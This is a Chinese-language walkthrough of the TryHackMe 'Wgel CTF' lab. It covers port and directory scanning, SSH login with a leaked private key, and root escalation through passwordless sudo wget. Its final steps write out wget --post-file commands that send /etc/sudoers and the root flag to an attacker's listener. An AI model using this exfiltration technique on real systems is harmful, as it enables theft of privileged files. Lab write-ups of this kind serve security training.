简介：

Can you exfiltrate the root flag?

房间链接：

https://tryhackme.com/room/wgelctf#

问题：

挑战开始：

首先先扫描下端口

└─# nmap -sC -sV 10.10.220.22
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-19 16:06 UTC
Nmap scan report for ip-10-10-220-22.eu-west-1.compute.internal (10.10.220.22)
Host is up (0.0075s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94961b66801b7648682d14b59a01aaaa (RSA)
|   256 18f710cc5f40f6cf92f86916e248f438 (ECDSA)
|_  256 b90b972e459bf32a4b11c7831033e0ce (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:70:39:55:69:61 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

访问80端口
发现是初始界面

尝试扫描目录
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.220.22/FUZZ > res.txt
扫描到/sitemap目录，访问到新的网站

感觉ffuf不太好用，这里换gobuster对网站再次扫描
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.220.22/sitemap/

这里扫到一些有用的信息

我们可以常使用私钥进行登录
登录的用户名在默认界面的源代码中有提示

接着把私钥保存到本地，赋予600的权限
尝试登录，成功登录

在Document目录下找到user flag

尝试提权
sudo -l发现可以免密root权限wget

在提权网站上查看
https://gtfobins.github.io/

但是这个方法不太适用，这里找到另一个方法

sudo wget --post-file=etc/sudoers {my_ip}

这里需要在攻击机上开一个监听

sudo /usr/bin/wget --post-file=/root/root_flag.txt 10.10.22.112:9999

成功获取root flag